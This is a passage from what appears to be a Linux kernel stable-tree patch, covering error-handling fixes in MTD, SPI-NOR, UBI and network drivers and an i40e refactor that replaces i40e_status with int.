++				dev_err(dev, "Failed to register OTP NVMEM device\n");
+ 				return PTR_ERR(nvmem);
+ 			}
+ 			mtd->otp_user_nvmem = nvmem;
+@@ -971,7 +971,7 @@ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ 			nvmem = mtd_otp_nvmem_register(mtd, "factory-otp", size,
+ 						       mtd_nvmem_fact_otp_reg_read);
+ 			if (IS_ERR(nvmem)) {
+-				dev_err(&mtd->dev, "Failed to register OTP NVMEM device\n");
++				dev_err(dev, "Failed to register OTP NVMEM device\n");
+ 				err = PTR_ERR(nvmem);
+ 				goto err;
+ 			}
+@@ -1023,10 +1023,14 @@ int mtd_device_parse_register(struct mtd_info *mtd, const char * const *types,
+ 
+ 	mtd_set_dev_defaults(mtd);
+ 
++	ret = mtd_otp_nvmem_add(mtd);
++	if (ret)
++		goto out;
++
+ 	if (IS_ENABLED(CONFIG_MTD_PARTITIONED_MASTER)) {
+ 		ret = add_mtd_device(mtd);
+ 		if (ret)
+-			return ret;
++			goto out;
+ 	}
+ 
+ 	/* Prefer parsed partitions over driver-provided fallback */
+@@ -1061,9 +1065,12 @@ int mtd_device_parse_register(struct mtd_info *mtd, const char * const *types,
+ 		register_reboot_notifier(&mtd->reboot_notifier);
+ 	}
+ 
+-	ret = mtd_otp_nvmem_add(mtd);
+-
+ out:
++	if (ret) {
++		nvmem_unregister(mtd->otp_user_nvmem);
++		nvmem_unregister(mtd->otp_factory_nvmem);
++	}
++
+ 	if (ret && device_is_registered(&mtd->dev))
+ 		del_mtd_device(mtd);
+ 
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 4244c6fd98111..bf50a35db711e 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2733,6 +2733,7 @@ static int spi_nor_quad_enable(struct spi_nor *nor)
+ 
+ static int spi_nor_init(struct spi_nor *nor)
+ {
++	struct spi_nor_flash_parameter *params = nor->params;
+ 	int err;
+ 
+ 	err = spi_nor_octal_dtr_enable(nor, true);
+@@ -2774,9 +2775,10 @@ static int spi_nor_init(struct spi_nor *nor)
+ 		 */
+ 		WARN_ONCE(nor->flags & SNOR_F_BROKEN_RESET,
+ 			  "enabling reset hack; may not recover from unexpected reboots\n");
+-		err = nor->params->set_4byte_addr_mode(nor, true);
++		err = params->set_4byte_addr_mode(nor, true);
+ 		if (err && err != -ENOTSUPP)
+ 			return err;
++		params->addr_mode_nbytes = 4;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/mtd/ubi/eba.c b/drivers/mtd/ubi/eba.c
+index 09c408c45a621..4e1d80746b04b 100644
+--- a/drivers/mtd/ubi/eba.c
++++ b/drivers/mtd/ubi/eba.c
+@@ -946,7 +946,7 @@ static int try_write_vid_and_data(struct ubi_volume *vol, int lnum,
+ 				  int offset, int len)
+ {
+ 	struct ubi_device *ubi = vol->ubi;
+-	int pnum, opnum, err, vol_id = vol->vol_id;
++	int pnum, opnum, err, err2, vol_id = vol->vol_id;
+ 
+ 	pnum = ubi_wl_get_peb(ubi);
+ 	if (pnum < 0) {
+@@ -981,10 +981,19 @@ static int try_write_vid_and_data(struct ubi_volume *vol, int lnum,
+ out_put:
+ 	up_read(&ubi->fm_eba_sem);
+ 
+-	if (err && pnum >= 0)
+-		err = ubi_wl_put_peb(ubi, vol_id, lnum, pnum, 1);
+-	else if (!err && opnum >= 0)
+-		err = ubi_wl_put_peb(ubi, vol_id, lnum, opnum, 0);
++	if (err && pnum >= 0) {
++		err2 = ubi_wl_put_peb(ubi, vol_id, lnum, pnum, 1);
++		if (err2) {
++			ubi_warn(ubi, "failed to return physical eraseblock %d, error %d",
++				 pnum, err2);
++		}
++	} else if (!err && opnum >= 0) {
++		err2 = ubi_wl_put_peb(ubi, vol_id, lnum, opnum, 0);
++		if (err2) {
++			ubi_warn(ubi, "failed to return physical eraseblock %d, error %d",
++				 opnum, err2);
++		}
++	}
+ 
+ 	return err;
+ }
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index 2f224b166bbb3..f7944fe2e0ba7 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -1427,7 +1427,6 @@ static void qca8k_pcs_get_state(struct phylink_pcs *pcs,
+ 
+ 	state->link = !!(reg & QCA8K_PORT_STATUS_LINK_UP);
+ 	state->an_complete = state->link;
+-	state->an_enabled = !!(reg & QCA8K_PORT_STATUS_LINK_AUTO);
+ 	state->duplex = (reg & QCA8K_PORT_STATUS_DUPLEX) ? DUPLEX_FULL :
+ 							   DUPLEX_HALF;
+ 
+diff --git a/drivers/net/ethernet/amd/nmclan_cs.c b/drivers/net/ethernet/amd/nmclan_cs.c
+index 823a329a921f4..0dd391c84c138 100644
+--- a/drivers/net/ethernet/amd/nmclan_cs.c
++++ b/drivers/net/ethernet/amd/nmclan_cs.c
+@@ -651,7 +651,7 @@ static int nmclan_config(struct pcmcia_device *link)
+     } else {
+       pr_notice("mace id not found: %x %x should be 0x40 0x?9\n",
+ 		sig[0], sig[1]);
+-      return -ENODEV;
++      goto failed;
+     }
+   }
+ 
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+index 027fff9f7db07..48ec323e0a920 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+@@ -295,7 +295,8 @@ static int dpaa_stop(struct net_device *net_dev)
+ {
+ 	struct mac_device *mac_dev;
+ 	struct dpaa_priv *priv;
+-	int i, err, error;
++	int i, error;
++	int err = 0;
+ 
+ 	priv = netdev_priv(net_dev);
+ 	mac_dev = priv->mac_dev;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h
+index 60e351665c707..e789729a9cfba 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e.h
++++ b/drivers/net/ethernet/intel/i40e/i40e.h
+@@ -1287,9 +1287,9 @@ void i40e_ptp_stop(struct i40e_pf *pf);
+ int i40e_ptp_alloc_pins(struct i40e_pf *pf);
+ int i40e_update_adq_vsi_queues(struct i40e_vsi *vsi, int vsi_offset);
+ int i40e_is_vsi_uplink_mode_veb(struct i40e_vsi *vsi);
+-i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf);
+-i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf);
+-i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf);
++int i40e_get_partition_bw_setting(struct i40e_pf *pf);
++int i40e_set_partition_bw_setting(struct i40e_pf *pf);
++int i40e_commit_partition_bw_setting(struct i40e_pf *pf);
+ void i40e_print_link_message(struct i40e_vsi *vsi, bool isup);
+ 
+ void i40e_set_fec_in_flags(u8 fec_cfg, u32 *flags);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_adminq.c b/drivers/net/ethernet/intel/i40e/i40e_adminq.c
+index 42439f725aa43..86fac8f959bb0 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_adminq.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_adminq.c
+@@ -47,9 +47,9 @@ static void i40e_adminq_init_regs(struct i40e_hw *hw)
+  *  i40e_alloc_adminq_asq_ring - Allocate Admin Queue send rings
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
++static int i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	ret_code = i40e_allocate_dma_mem(hw, &hw->aq.asq.desc_buf,
+ 					 i40e_mem_atq_ring,
+@@ -74,9 +74,9 @@ static i40e_status i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
+  *  i40e_alloc_adminq_arq_ring - Allocate Admin Queue receive rings
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_adminq_arq_ring(struct i40e_hw *hw)
++static int i40e_alloc_adminq_arq_ring(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	ret_code = i40e_allocate_dma_mem(hw, &hw->aq.arq.desc_buf,
+ 					 i40e_mem_arq_ring,
+@@ -115,11 +115,11 @@ static void i40e_free_adminq_arq(struct i40e_hw *hw)
+  *  i40e_alloc_arq_bufs - Allocate pre-posted buffers for the receive queue
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_arq_bufs(struct i40e_hw *hw)
++static int i40e_alloc_arq_bufs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_aq_desc *desc;
+ 	struct i40e_dma_mem *bi;
++	int ret_code;
+ 	int i;
+ 
+ 	/* We'll be allocating the buffer info memory first, then we can
+@@ -182,10 +182,10 @@ unwind_alloc_arq_bufs:
+  *  i40e_alloc_asq_bufs - Allocate empty buffer structs for the send queue
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_asq_bufs(struct i40e_hw *hw)
++static int i40e_alloc_asq_bufs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_dma_mem *bi;
++	int ret_code;
+ 	int i;
+ 
+ 	/* No mapped memory needed yet, just the buffer info structures */
+@@ -266,9 +266,9 @@ static void i40e_free_asq_bufs(struct i40e_hw *hw)
+  *
+  *  Configure base address and length registers for the transmit queue
+  **/
+-static i40e_status i40e_config_asq_regs(struct i40e_hw *hw)
++static int i40e_config_asq_regs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg = 0;
+ 
+ 	/* Clear Head and Tail */
+@@ -295,9 +295,9 @@ static i40e_status i40e_config_asq_regs(struct i40e_hw *hw)
+  *
+  * Configure base address and length registers for the receive (event queue)
+  **/
+-static i40e_status i40e_config_arq_regs(struct i40e_hw *hw)
++static int i40e_config_arq_regs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg = 0;
+ 
+ 	/* Clear Head and Tail */
+@@ -334,9 +334,9 @@ static i40e_status i40e_config_arq_regs(struct i40e_hw *hw)
+  *  Do *NOT* hold the lock when calling this as the memory allocation routines
+  *  called are not going to be atomic context safe
+  **/
+-static i40e_status i40e_init_asq(struct i40e_hw *hw)
++static int i40e_init_asq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->aq.asq.count > 0) {
+ 		/* queue already initialized */
+@@ -393,9 +393,9 @@ init_adminq_exit:
+  *  Do *NOT* hold the lock when calling this as the memory allocation routines
+  *  called are not going to be atomic context safe
+  **/
+-static i40e_status i40e_init_arq(struct i40e_hw *hw)
++static int i40e_init_arq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->aq.arq.count > 0) {
+ 		/* queue already initialized */
+@@ -445,9 +445,9 @@ init_adminq_exit:
+  *
+  *  The main shutdown routine for the Admin Send Queue
+  **/
+-static i40e_status i40e_shutdown_asq(struct i40e_hw *hw)
++static int i40e_shutdown_asq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 
+@@ -479,9 +479,9 @@ shutdown_asq_out:
+  *
+  *  The main shutdown routine for the Admin Receive Queue
+  **/
+-static i40e_status i40e_shutdown_arq(struct i40e_hw *hw)
++static int i40e_shutdown_arq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	mutex_lock(&hw->aq.arq_mutex);
+ 
+@@ -582,12 +582,12 @@ static void i40e_set_hw_flags(struct i40e_hw *hw)
+  *     - hw->aq.arq_buf_size
+  *     - hw->aq.asq_buf_size
+  **/
+-i40e_status i40e_init_adminq(struct i40e_hw *hw)
++int i40e_init_adminq(struct i40e_hw *hw)
+ {
+ 	u16 cfg_ptr, oem_hi, oem_lo;
+ 	u16 eetrack_lo, eetrack_hi;
+-	i40e_status ret_code;
+ 	int retry = 0;
++	int ret_code;
+ 
+ 	/* verify input for valid configuration */
+ 	if ((hw->aq.num_arq_entries == 0) ||
+@@ -780,7 +780,7 @@ static bool i40e_asq_done(struct i40e_hw *hw)
+  *  This is the main send command driver routine for the Admin Queue send
+  *  queue.  It runs the queue, cleans the queue, etc
+  **/
+-static i40e_status
++static int
+ i40e_asq_send_command_atomic_exec(struct i40e_hw *hw,
+ 				  struct i40e_aq_desc *desc,
+ 				  void *buff, /* can be NULL */
+@@ -788,12 +788,12 @@ i40e_asq_send_command_atomic_exec(struct i40e_hw *hw,
+ 				  struct i40e_asq_cmd_details *cmd_details,
+ 				  bool is_atomic_context)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_dma_mem *dma_buff = NULL;
+ 	struct i40e_asq_cmd_details *details;
+ 	struct i40e_aq_desc *desc_on_ring;
+ 	bool cmd_completed = false;
+ 	u16  retval = 0;
++	int status = 0;
+ 	u32  val = 0;
+ 
+ 	if (hw->aq.asq.count == 0) {
+@@ -984,7 +984,7 @@ asq_send_command_error:
+  *  Acquires the lock and calls the main send command execution
+  *  routine.
+  **/
+-i40e_status
++int
+ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 			     struct i40e_aq_desc *desc,
+ 			     void *buff, /* can be NULL */
+@@ -992,7 +992,7 @@ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 			     struct i40e_asq_cmd_details *cmd_details,
+ 			     bool is_atomic_context)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 	status = i40e_asq_send_command_atomic_exec(hw, desc, buff, buff_size,
+@@ -1003,7 +1003,7 @@ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 	return status;
+ }
+ 
+-i40e_status
++int
+ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 		      void *buff, /* can be NULL */ u16  buff_size,
+ 		      struct i40e_asq_cmd_details *cmd_details)
+@@ -1026,7 +1026,7 @@ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+  *  routine. Returns the last Admin Queue status in aq_status
+  *  to avoid race conditions in access to hw->aq.asq_last_status.
+  **/
+-i40e_status
++int
+ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				struct i40e_aq_desc *desc,
+ 				void *buff, /* can be NULL */
+@@ -1035,7 +1035,7 @@ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				bool is_atomic_context,
+ 				enum i40e_admin_queue_err *aq_status)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 	status = i40e_asq_send_command_atomic_exec(hw, desc, buff,
+@@ -1048,7 +1048,7 @@ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 	return status;
+ }
+ 
+-i40e_status
++int
+ i40e_asq_send_command_v2(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 			 void *buff, /* can be NULL */ u16  buff_size,
+ 			 struct i40e_asq_cmd_details *cmd_details,
+@@ -1084,14 +1084,14 @@ void i40e_fill_default_direct_cmd_desc(struct i40e_aq_desc *desc,
+  *  the contents through e.  It can also return how many events are
+  *  left to process through 'pending'
+  **/
+-i40e_status i40e_clean_arq_element(struct i40e_hw *hw,
+-					     struct i40e_arq_event_info *e,
+-					     u16 *pending)
++int i40e_clean_arq_element(struct i40e_hw *hw,
++			   struct i40e_arq_event_info *e,
++			   u16 *pending)
+ {
+-	i40e_status ret_code = 0;
+ 	u16 ntc = hw->aq.arq.next_to_clean;
+ 	struct i40e_aq_desc *desc;
+ 	struct i40e_dma_mem *bi;
++	int ret_code = 0;
+ 	u16 desc_idx;
+ 	u16 datalen;
+ 	u16 flags;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_alloc.h b/drivers/net/ethernet/intel/i40e/i40e_alloc.h
+index cb8689222c8b7..a6c9a9e343d11 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_alloc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_alloc.h
+@@ -20,16 +20,16 @@ enum i40e_memory_type {
+ };
+ 
+ /* prototype for functions used for dynamic memory allocation */
+-i40e_status i40e_allocate_dma_mem(struct i40e_hw *hw,
+-					    struct i40e_dma_mem *mem,
+-					    enum i40e_memory_type type,
+-					    u64 size, u32 alignment);
+-i40e_status i40e_free_dma_mem(struct i40e_hw *hw,
+-					struct i40e_dma_mem *mem);
+-i40e_status i40e_allocate_virt_mem(struct i40e_hw *hw,
+-					     struct i40e_virt_mem *mem,
+-					     u32 size);
+-i40e_status i40e_free_virt_mem(struct i40e_hw *hw,
+-					 struct i40e_virt_mem *mem);
++int i40e_allocate_dma_mem(struct i40e_hw *hw,
++			  struct i40e_dma_mem *mem,
++			  enum i40e_memory_type type,
++			  u64 size, u32 alignment);
++int i40e_free_dma_mem(struct i40e_hw *hw,
++		      struct i40e_dma_mem *mem);
++int i40e_allocate_virt_mem(struct i40e_hw *hw,
++			   struct i40e_virt_mem *mem,
++			   u32 size);
++int i40e_free_virt_mem(struct i40e_hw *hw,
++		       struct i40e_virt_mem *mem);
+ 
+ #endif /* _I40E_ALLOC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_client.c b/drivers/net/ethernet/intel/i40e/i40e_client.c
+index 10d7a982a5b9b..8bcb98b85e3d9 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_client.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_client.c
+@@ -541,7 +541,7 @@ static int i40e_client_virtchnl_send(struct i40e_info *ldev,
+ {
+ 	struct i40e_pf *pf = ldev->pf;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status err;
++	int err;
+ 
+ 	err = i40e_aq_send_msg_to_vf(hw, vf_id, VIRTCHNL_OP_IWARP,
+ 				     0, msg, len, NULL);
+@@ -674,7 +674,7 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_vsi_context ctxt;
+ 	bool update = true;
+-	i40e_status err;
++	int err;
+ 
+ 	/* TODO: for now do not allow setting VF's VSI setting */
+ 	if (is_vf)
+@@ -686,8 +686,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 	ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw,
+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -714,8 +714,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 		err = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 		if (err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "update VSI ctxt for PE failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++				 "update VSI ctxt for PE failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_common.c b/drivers/net/ethernet/intel/i40e/i40e_common.c
+index 8f764ff5c990f..ed88e38d488b2 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_common.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_common.c
+@@ -14,9 +14,9 @@
+  * This function sets the mac type of the adapter based on the
+  * vendor ID and device ID stored in the hw structure.
+  **/
+-i40e_status i40e_set_mac_type(struct i40e_hw *hw)
++int i40e_set_mac_type(struct i40e_hw *hw)
+ {
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	if (hw->vendor_id == PCI_VENDOR_ID_INTEL) {
+ 		switch (hw->device_id) {
+@@ -124,154 +124,6 @@ const char *i40e_aq_str(struct i40e_hw *hw, enum i40e_admin_queue_err aq_err)
+ 	return hw->err_str;
+ }
+ 
+-/**
+- * i40e_stat_str - convert status err code to a string
+- * @hw: pointer to the HW structure
+- * @stat_err: the status error code to convert
+- **/
+-const char *i40e_stat_str(struct i40e_hw *hw, i40e_status stat_err)
+-{
+-	switch (stat_err) {
+-	case 0:
+-		return "OK";
+-	case I40E_ERR_NVM:
+-		return "I40E_ERR_NVM";
+-	case I40E_ERR_NVM_CHECKSUM:
+-		return "I40E_ERR_NVM_CHECKSUM";
+-	case I40E_ERR_PHY:
+-		return "I40E_ERR_PHY";
+-	case I40E_ERR_CONFIG:
+-		return "I40E_ERR_CONFIG";
+-	case I40E_ERR_PARAM:
+-		return "I40E_ERR_PARAM";
+-	case I40E_ERR_MAC_TYPE:
+-		return "I40E_ERR_MAC_TYPE";
+-	case I40E_ERR_UNKNOWN_PHY:
+-		return "I40E_ERR_UNKNOWN_PHY";
+-	case I40E_ERR_LINK_SETUP:
+-		return "I40E_ERR_LINK_SETUP";
+-	case I40E_ERR_ADAPTER_STOPPED:
+-		return "I40E_ERR_ADAPTER_STOPPED";
+-	case I40E_ERR_INVALID_MAC_ADDR:
+-		return "I40E_ERR_INVALID_MAC_ADDR";
+-	case I40E_ERR_DEVICE_NOT_SUPPORTED:
+-		return "I40E_ERR_DEVICE_NOT_SUPPORTED";
+-	case I40E_ERR_PRIMARY_REQUESTS_PENDING:
+-		return "I40E_ERR_PRIMARY_REQUESTS_PENDING";
+-	case I40E_ERR_INVALID_LINK_SETTINGS:
+-		return "I40E_ERR_INVALID_LINK_SETTINGS";
+-	case I40E_ERR_AUTONEG_NOT_COMPLETE:
+-		return "I40E_ERR_AUTONEG_NOT_COMPLETE";
+-	case I40E_ERR_RESET_FAILED:
+-		return "I40E_ERR_RESET_FAILED";
+-	case I40E_ERR_SWFW_SYNC:
+-		return "I40E_ERR_SWFW_SYNC";
+-	case I40E_ERR_NO_AVAILABLE_VSI:
+-		return "I40E_ERR_NO_AVAILABLE_VSI";
+-	case I40E_ERR_NO_MEMORY:
+-		return "I40E_ERR_NO_MEMORY";
+-	case I40E_ERR_BAD_PTR:
+-		return "I40E_ERR_BAD_PTR";
+-	case I40E_ERR_RING_FULL:
+-		return "I40E_ERR_RING_FULL";
+-	case I40E_ERR_INVALID_PD_ID:
+-		return "I40E_ERR_INVALID_PD_ID";
+-	case I40E_ERR_INVALID_QP_ID:
+-		return "I40E_ERR_INVALID_QP_ID";
+-	case I40E_ERR_INVALID_CQ_ID:
+-		return "I40E_ERR_INVALID_CQ_ID";
+-	case I40E_ERR_INVALID_CEQ_ID:
+-		return "I40E_ERR_INVALID_CEQ_ID";
+-	case I40E_ERR_INVALID_AEQ_ID:
+-		return "I40E_ERR_INVALID_AEQ_ID";
+-	case I40E_ERR_INVALID_SIZE:
+-		return "I40E_ERR_INVALID_SIZE";
+-	case I40E_ERR_INVALID_ARP_INDEX:
+-		return "I40E_ERR_INVALID_ARP_INDEX";
+-	case I40E_ERR_INVALID_FPM_FUNC_ID:
+-		return "I40E_ERR_INVALID_FPM_FUNC_ID";
+-	case I40E_ERR_QP_INVALID_MSG_SIZE:
+-		return "I40E_ERR_QP_INVALID_MSG_SIZE";
+-	case I40E_ERR_QP_TOOMANY_WRS_POSTED:
+-		return "I40E_ERR_QP_TOOMANY_WRS_POSTED";
+-	case I40E_ERR_INVALID_FRAG_COUNT:
+-		return "I40E_ERR_INVALID_FRAG_COUNT";
+-	case I40E_ERR_QUEUE_EMPTY:
+-		return "I40E_ERR_QUEUE_EMPTY";
+-	case I40E_ERR_INVALID_ALIGNMENT:
+-		return "I40E_ERR_INVALID_ALIGNMENT";
+-	case I40E_ERR_FLUSHED_QUEUE:
+-		return "I40E_ERR_FLUSHED_QUEUE";
+-	case I40E_ERR_INVALID_PUSH_PAGE_INDEX:
+-		return "I40E_ERR_INVALID_PUSH_PAGE_INDEX";
+-	case I40E_ERR_INVALID_IMM_DATA_SIZE:
+-		return "I40E_ERR_INVALID_IMM_DATA_SIZE";
+-	case I40E_ERR_TIMEOUT:
+-		return "I40E_ERR_TIMEOUT";
+-	case I40E_ERR_OPCODE_MISMATCH:
+-		return "I40E_ERR_OPCODE_MISMATCH";
+-	case I40E_ERR_CQP_COMPL_ERROR:
+-		return "I40E_ERR_CQP_COMPL_ERROR";
+-	case I40E_ERR_INVALID_VF_ID:
+-		return "I40E_ERR_INVALID_VF_ID";
+-	case I40E_ERR_INVALID_HMCFN_ID:
+-		return "I40E_ERR_INVALID_HMCFN_ID";
+-	case I40E_ERR_BACKING_PAGE_ERROR:
+-		return "I40E_ERR_BACKING_PAGE_ERROR";
+-	case I40E_ERR_NO_PBLCHUNKS_AVAILABLE:
+-		return "I40E_ERR_NO_PBLCHUNKS_AVAILABLE";
+-	case I40E_ERR_INVALID_PBLE_INDEX:
+-		return "I40E_ERR_INVALID_PBLE_INDEX";
+-	case I40E_ERR_INVALID_SD_INDEX:
+-		return "I40E_ERR_INVALID_SD_INDEX";
+-	case I40E_ERR_INVALID_PAGE_DESC_INDEX:
+-		return "I40E_ERR_INVALID_PAGE_DESC_INDEX";
+-	case I40E_ERR_INVALID_SD_TYPE:
+-		return "I40E_ERR_INVALID_SD_TYPE";
+-	case I40E_ERR_MEMCPY_FAILED:
+-		return "I40E_ERR_MEMCPY_FAILED";
+-	case I40E_ERR_INVALID_HMC_OBJ_INDEX:
+-		return "I40E_ERR_INVALID_HMC_OBJ_INDEX";
+-	case I40E_ERR_INVALID_HMC_OBJ_COUNT:
+-		return "I40E_ERR_INVALID_HMC_OBJ_COUNT";
+-	case I40E_ERR_INVALID_SRQ_ARM_LIMIT:
+-		return "I40E_ERR_INVALID_SRQ_ARM_LIMIT";
+-	case I40E_ERR_SRQ_ENABLED:
+-		return "I40E_ERR_SRQ_ENABLED";
+-	case I40E_ERR_ADMIN_QUEUE_ERROR:
+-		return "I40E_ERR_ADMIN_QUEUE_ERROR";
+-	case I40E_ERR_ADMIN_QUEUE_TIMEOUT:
+-		return "I40E_ERR_ADMIN_QUEUE_TIMEOUT";
+-	case I40E_ERR_BUF_TOO_SHORT:
+-		return "I40E_ERR_BUF_TOO_SHORT";
+-	case I40E_ERR_ADMIN_QUEUE_FULL:
+-		return "I40E_ERR_ADMIN_QUEUE_FULL";
+-	case I40E_ERR_ADMIN_QUEUE_NO_WORK:
+-		return "I40E_ERR_ADMIN_QUEUE_NO_WORK";
+-	case I40E_ERR_BAD_IWARP_CQE:
+-		return "I40E_ERR_BAD_IWARP_CQE";
+-	case I40E_ERR_NVM_BLANK_MODE:
+-		return "I40E_ERR_NVM_BLANK_MODE";
+-	case I40E_ERR_NOT_IMPLEMENTED:
+-		return "I40E_ERR_NOT_IMPLEMENTED";
+-	case I40E_ERR_PE_DOORBELL_NOT_ENABLED:
+-		return "I40E_ERR_PE_DOORBELL_NOT_ENABLED";
+-	case I40E_ERR_DIAG_TEST_FAILED:
+-		return "I40E_ERR_DIAG_TEST_FAILED";
+-	case I40E_ERR_NOT_READY:
+-		return "I40E_ERR_NOT_READY";
+-	case I40E_NOT_SUPPORTED:
+-		return "I40E_NOT_SUPPORTED";
+-	case I40E_ERR_FIRMWARE_API_VERSION:
+-		return "I40E_ERR_FIRMWARE_API_VERSION";
+-	case I40E_ERR_ADMIN_QUEUE_CRITICAL_ERROR:
+-		return "I40E_ERR_ADMIN_QUEUE_CRITICAL_ERROR";
+-	}
+-
+-	snprintf(hw->err_str, sizeof(hw->err_str), "%d", stat_err);
+-	return hw->err_str;
+-}
+-
+ /**
+  * i40e_debug_aq
+  * @hw: debug mask related to admin queue
+@@ -355,13 +207,13 @@ bool i40e_check_asq_alive(struct i40e_hw *hw)
+  * Tell the Firmware that we're shutting down the AdminQ and whether
+  * or not the driver is unloading as well.
+  **/
+-i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw,
+-					     bool unloading)
++int i40e_aq_queue_shutdown(struct i40e_hw *hw,
++			   bool unloading)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_queue_shutdown *cmd =
+ 		(struct i40e_aqc_queue_shutdown *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_queue_shutdown);
+@@ -384,15 +236,15 @@ i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw,
+  *
+  * Internal function to get or set RSS look up table
+  **/
+-static i40e_status i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
+-					   u16 vsi_id, bool pf_lut,
+-					   u8 *lut, u16 lut_size,
+-					   bool set)
++static int i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
++				   u16 vsi_id, bool pf_lut,
++				   u8 *lut, u16 lut_size,
++				   bool set)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_set_rss_lut *cmd_resp =
+ 		   (struct i40e_aqc_get_set_rss_lut *)&desc.params.raw;
++	int status;
+ 
+ 	if (set)
+ 		i40e_fill_default_direct_cmd_desc(&desc,
+@@ -437,8 +289,8 @@ static i40e_status i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
+  *
+  * get the RSS lookup table, PF or VSI type
+  **/
+-i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+-				bool pf_lut, u8 *lut, u16 lut_size)
